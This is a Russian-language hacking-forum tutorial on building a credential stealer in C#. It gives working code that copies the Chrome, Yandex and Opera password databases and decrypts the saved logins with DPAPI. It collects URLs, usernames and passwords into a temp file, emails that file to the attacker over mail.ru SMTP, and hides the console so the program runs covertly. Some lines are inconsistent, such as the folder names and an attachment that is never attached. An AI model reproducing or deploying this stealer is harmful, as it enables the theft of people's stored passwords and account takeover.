Пишем стиллер на C# x2

[HHIDE_DUMP]

Хало, хуцкиры

Это вторая тема с написанием стиллера, может быть она будет лучше, может хуже, но не кинуть ее сюда я не могу, и да, я опять же не специалист в этом деле, если возникнут вопросы я последний кого следует спрашивать, если вы все таки не нашли информации, то спросите самого себя,нахуя вам это? Можно начать.
Принцип работы стиллера:
-Сначала стиллер проверяет наличие браузерных папок.
-Если файл содержащий пароли существует, идёт проверка на их содержание.
-Если данные не пусты, стиллер добавляет их в текстовой файл.
-После того, как стиллер закончил проверку, он отправляет данные прямо к нам в руки
Создаем проект в visual studio, версия фрейма - 4.5.

Program.cs Добавим необходимые юзинги:​

using System;

using System.Collections.Generic;

using System.IO;

using System.Linq;

using System.Net;

using System.Net.Mail;

using System.Text;

using System.Threading.Tasks;

Для начала мы создадим папку где будет лежать файл с паролем:

Directory.CreateDirectory(Path.GetTempPath() + "StealLog");

Папка будет создана в каталоге %TEMP%.
Создадим переменную paths в которой хранятся пути к файлам Login Data (Файлы Login Data содержат пароли): ​

string[] paths = {
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data",
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Yandex\YandexBrowser\User Data\Default\Login Data",
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Opera Software\Opera Stable\Login Data"
};

Теперь создаём переменную pwd_text которая пока что ничему не равна:

string pwd_text = "";

Добавим в код следующие, объяснение кода в комментариях: ​

foreach (string p in paths)  //идем по папкам
           {
               var pas = Passwords.ReadPass(p);
               if (File.Exists(p))                  // если файл с паролями существует, то выполняем следующие действия
               {
                   pwd_text += "Stealer by: @deepside\r\n\r\n";
                   foreach (var item in pas)
                   {
                       if ((item.Item2.Length > 0) && (item.Item2.Length > 0))     // если значения логина и пароля не пустые, то заносим их в переменную
                       {
                           pwd_text += "URL: " + item.Item1 + "\r\n" + "Login: " + item.Item2 + "\r\n" + "Password: " + item.Item3 + "\r\n";
                           pwd_text += " \r\n";
                       }
                   }
               }
           }

Делаем проверку, если файл Login Data находится в нашей папке, то удаляем его.​

if (File.Exists(Path.GetTempPath() + @"StealLog
\Login Data"))
           {
            File.Delete(Path.GetTempPath() + @"StealLog
\Login Data");
           }

Запишем все пароли в .txt файл:​

File.WriteAllText(Path.GetTempPath() + @"StealLog
\Passwords.txt", pwd_text);

Создаём новый класс с именем Passwords.cs.
Добавляем туда этот код, объяснение в комментариях:​

static public IEnumerable<Tuple<string, string, string>> ReadPass(string dbPath)
       {
           if (File.Exists(Path.GetTempPath() + @"StealLog
\Login Data"))   // Если файл по данному пути существует, то удаляем его
           {
               File.Delete(Path.GetTempPath() + @"StealLog
\Login Data");
           }
           File.Copy(dbPath, Path.GetTempPath() + @"StealLog
\Login Data");     // копируем файл с паролями для того, чтобы не закрывать браузер
           dbPath = Path.GetTempPath() + @"StealLog
\Login Data";
           var connectionString = "Data Source=" + dbPath + ";pooling=false";
           using (var conn = new System.Data.SQLite.SQLiteConnection(connectionString))
           using (var cmd = conn.CreateCommand())
           {
               cmd.CommandText = "SELECT password_value,username_value,origin_url FROM logins";
               conn.Open();
               using (var reader = cmd.ExecuteReader())
               {
                   while (reader.Read())
                   {
                       var encryptedData = (byte[])reader[0];
                       var decodedData = System.Security.Cryptography.ProtectedData.Unprotect(encryptedData, null, System.Security.Cryptography.DataProtectionScope.CurrentUser);  // расшифровка паролей
                       var plainText = Encoding.ASCII.GetString(decodedData);
                       yield return Tuple.Create(reader.GetString(2), reader.GetString(1), plainText);
                   }
               }
               conn.Close();
           }
       }

Если появились ошибки, исправляем их, добавим ссылку:
Проект - Добавить ссылку. Ищем System.Security

Для работы с Login Data установим библиотеку:
Проект - Управление пакетами Nuget. Ищем в поискe "sqlite" и устанавливаем пакет

Теперь нам нужно отправить файл с паролями. Возвращаемся к Program.cs и добавляем следующий код: ​

SmtpClient Smtp = new SmtpClient("smtp.mail.ru", 587); // Создаём Smpt соединения с почтой mail.tu

Smtp.Credentials = new NetworkCredential("почта@mail.ru", "пароль"); // Меняем на своё, можно создать левую почту.

Smtp.EnableSsl = true;
MailMessage Message = new MailMessage();
Message.From = new MailAddress("почта@mail.ru"); // Кому отправляем
Message.To.Add("почта@mail.ru");
Message.Subject = "Log | @site.ru"; // Заголовок письма
Message.Body = "Stealer by kto-to"; // Текст письма
(new Attachment(Path.GetTempPath() + @"RebornExodus\Passwords.txt")); // Добавляем вложение с логом
Smtp.Send(Message); // Отправляем

Формат лога:

Лог приходит значит мы на верном пути. Теперь нам нужно кое что исправить. Наверное ты заметил, что при запуске стиллера выводится консоль. Как это исправить?
Заходим в свойства проекта, далее делаем как на скрине:

Выбираем "Приложение Windows". Теперь консоль не открывается и стиллер запускается скрытно.

Спойлер: Credits

Оригинал -

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Discord - 蝶UndetectedButterFly1337.pw#0187
vk -

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

telegram - @UndetectedButterFly